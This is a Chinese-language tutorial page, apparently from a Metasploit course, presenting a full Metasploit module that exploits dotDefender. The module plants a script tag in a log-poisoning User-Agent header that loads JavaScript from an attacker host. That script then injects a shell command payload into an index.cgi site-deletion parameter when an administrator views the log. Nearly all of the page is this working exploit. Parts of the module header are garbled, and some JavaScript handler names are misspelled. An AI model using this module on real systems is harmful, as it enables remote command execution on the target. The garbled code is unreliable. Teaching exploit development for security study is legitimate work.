Metasploit 最终 dotDefender 漏洞利用

dotDefender

所以现在我们可以再次看到最终的 dotDefender 漏洞利用。只需几个简单的步骤,就可以从 PoC 到完整的 Metasploit 模块。我们将在后面的章节中进一步扩展这些代码,深入探讨如何制作更好的 Metasploit 模块,例如扩展目标、提高可靠性等。

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3  "dotDefender  %q{
                    This module exploits a vulnerability found in dotDefender.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'John Dos',   #Initial remote execution discovery
                    'rAWjAW'  	  #Everything else
                ],
            'References'     =>
                [
                    ['EDB', '14310'],
                    ['URL', 'http://www.exploit-db.com/exploits/14310/']
                ],
            'Arch'           => ARCH_CMD,
	   'Compat'          =>
		{
	            'PayloadType' => 'cmd'
		},
            'Platform'       => ['unix','linux'],
            'Targets'        =>
                [
                    ['dotDefender  false,
            'DefaultTarget'  => 0))
 
        register_options(
            [
            	OptString.new('TRIGGERLOG',  [true, 'This is what is used to trigger a log entry.','<script>alert(\'xss\')>/script>']),
		OptString.new('SITENAME',  [true, 'This is usually the same as RHOST but is available as an option if different']),
		OptString.new('LHOST',  [true, 'This is the IP to connect back to for the javascript','0.0.0.0']),
		OptString.new('URIPATH', [true, 'This is the URI path that will be created for the javascript hosted file','DotDefender.js']),
		OptString.new('SRVPORT', [true, 'This is the port for the javascript to connect back to','80']),
            ], self.class)
    	end


	# Stage one: poison the target's log with a request that carries the
	# second-stage script reference.
	#
	# Sends a single GET to http://RHOST/ whose User-Agent header embeds a
	# <script src="http://LHOST:SRVPORT/URIPATH"> tag and whose body is the
	# TRIGGERLOG string (default: an XSS-style probe, see register_options).
	# The response is assigned to `resp` but never inspected. After the
	# request, `super` is invoked; presumably this starts the module's own
	# HTTP server so that on_request_uri can serve the script -- confirm
	# against the mixin this class includes (the header is garbled above).
	#
	# Defender's view: this stage is identifiable on the wire by a GET whose
	# User-Agent contains a <script tag and whose body carries the
	# TRIGGERLOG value; both end up verbatim in the appliance's log entry.
	def exploit
            # NOTE(review): 'lhost' / 'uripath' are registered in upper case
            # (LHOST, URIPATH); this relies on case-insensitive datastore lookup.
            resp = send_request_raw({
	    'uri'     => "http://#{rhost}/",
	    'version' => '1.1',
	    'method' => 'GET',
	    'headers' =>
	    {
	            'Content-Type' => 'application/x-www-form-urlencoded',
                    'User-Agent' => "Mozilla Firefox <script language=\"JavaScript\" src=\"http://#{datastore['lhost']}:#{datastore['SRVPORT']}/#{datastore['uripath']}\">",
             },
                    'data' => "#{datastore['TRIGGERLOG']}"
          })
		
          # Hand off to the parent implementation (server start is inferred, not shown here).
          super

          end

          # Stage two: serve the JavaScript that runs in the browser of whoever
          # views the poisoned log entry (presumably a dotDefender administrator
          # in the management UI -- not verifiable from this file).
          #
          # @param cli     the connected client the script is written back to
          # @param request the incoming HTTP request; unused by this handler
          #
          # The script issues four POSTs to ../index.cgi (relative to the page
          # that loaded it): "deletesite" with the command payload appended to
          # deletesitename after a ';', a "reload", a "newsite" that recreates
          # SITENAME, and a final "reload". The readyState callbacks only
          # alert() the response text.
          #
          # Defender's view: the tell-tale request is a POST to index.cgi whose
          # deletesitename parameter contains ';' and shell text, followed by
          # reload/newsite actions from the same session.
          def on_request_uri(cli, request)

		# Bail out if no payload can be generated for this client. `p` itself is
		# never used below; the template interpolates payload.encoded instead.
		return if ((p = regenerate_payload(cli)) == nil)

		sitename = datastore['SITENAME']

		# JavaScript body; SITENAME and the encoded payload are interpolated
		# directly into the string literal below.
		content = %Q|
		var http = new XMLHttpRequest();
		var url = "../index.cgi";
		var params = "sitename=#{sitename}&deletesitename=#{sitename};#{payload.encoded};&action=deletesite&linenum=14";
		http.open("POST",url,true);
		http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http.setRequestHeader("Content-lenth", params.length);
		http.setRequestHeader("Connection","close");

		http.conreadystatechange = function() {
		    if(http.readyState == 4 && http.status == 200) {
		        alert(http.responseText);
		        }
		}
		http.send(params);


		var http2 = new XMLHttpRequest();
		var params2 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
		http2.open("POST",url,true);
		http2.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http2.setRequestHeader("Content-lenth", params2.length);
		http2.setRequestHeader("Connection","close");

		http2.conreadystatechange = function() {
		    if(http2.readyState == 4 && http2.status == 200) {
		        alert(http2.responseText);
		        }
		}
		http2.send(params2);


		var http3 = new XMLHttpRequest();
		var params3 = "newsitename=#{sitename}&action=newsite";
		http3.open("POST",url,true);
		http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http3.setRequestHeader("Content-lenth", params3.length);
		http3.setRequestHeader("Connection","close");

		http3.conreadystatechange = function() {
		    if(http3.readyState == 4 && http3.status == 200) {
		        alert(http3.responseText);
		        }
		}
		http3.send(params3);


		var http4 = new XMLHttpRequest();
		var params4 = "action=reload&cursite=&servgroups=&submit=Refresh_Settings";
		http4.open("POST",url,true);
		http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
		http4.setRequestHeader("Content-lenth", params4.length);
		http4.setRequestHeader("Connection","close");

		http4.conreadystatechange = function() {
		    if(http4.readyState == 4 && http4.status == 200) {
		        alert(http4.responseText);
		        }
		}
		http4.send(params4);
			|

		print_status("Sending #{self.name}")

		# Written back as an HTML response even though the content is script.
		send_response_html(cli, content)
		
          end

end
发布日期:2018年05月30日 00:42:54  所属分类:Metasploit
最后更新时间:2018-05-30 22:06:10
付杰